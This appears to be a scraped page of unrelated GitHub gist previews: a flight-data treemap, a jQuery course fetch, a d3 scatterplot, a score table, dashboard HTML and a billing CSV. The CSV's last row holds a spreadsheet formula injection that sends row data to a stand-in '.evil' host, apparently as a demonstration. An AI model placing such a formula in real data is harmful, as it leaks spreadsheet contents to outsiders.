Treemap from CSV of flights taken by members of the UK Government Home Office in 2011.
Original dataset from: http://data.gov.uk/dataset/home-office-flight-data
Thanks to: PMeinshausen phoebebright mbostock
Treemap from CSV of flights taken by members of the UK Government Home Office in 2011.
Original dataset from: http://data.gov.uk/dataset/home-office-flight-data
Thanks to: PMeinshausen phoebebright mbostock
<ul id="courses"></ul> | |
<script src="http://code.jquery.com/jquery-1.11.1.min.js"></script> | |
<script type="text/javascript"> | |
$( document ).ready(function() { | |
$.getJSON( "http://theodi.org/courses.json?callback=?", function( data ) { | |
courses = data.results; | |
for (i=0;i<courses.length;i++) { | |
course = courses[i]; | |
console.log(course["title"]); | |
} |
d3 scatterplot example using the Breakfast Cereal Dataset from http://idvbook.com and based on the scatterplot example at http://bl.ocks.org/mbostock/3887118 sad
Theme | Q1 | Q2 | Q3 | Q4 | Q5 | Q6 | Q7 | |
---|---|---|---|---|---|---|---|---|
Process | 3 | 2 | 4 | 5 | 1 | 2 | 3 | |
Knowledge | 2 | 5 | 3 | 4 | 2 | 1 | 3 | |
Engagement | 2 | 3 | 1 | 1 | 1 | 2 | 1 | |
Investment | 3 | 2 | 1 | 4 | 5 | 1 | 2 | |
Goverance | 2 | 3 | 2 | 3 | 4 | 4 | 2 |
<section id="main"> | |
<h2>Company Status</h2> | |
<div id="status_pie"></div> | |
<br/> | |
<h2 id="timetitle">Expenses per day</h2> | |
<div id="timeline"></div> | |
<br/> | |
<h2>Raw data</h2> | |
<table id="dc-data-table" class="table table-hover"></table> | |
</section> |
UserId | BillToDate | ProjectName | Description | DurationMinutes | |
---|---|---|---|---|---|
1 | 2017-07-25 | Test Project | Flipped the jibbet | 60 | |
2 | 2017-07-25 | Important Client | Bop, dop, and giglip | 240 | |
2 | 2017-07-25 | Important Client | =IMPORTXML(CONCAT("http://some-server-with-log.evil?v=", CONCATENATE(A2:E2)),"//a") | 240 |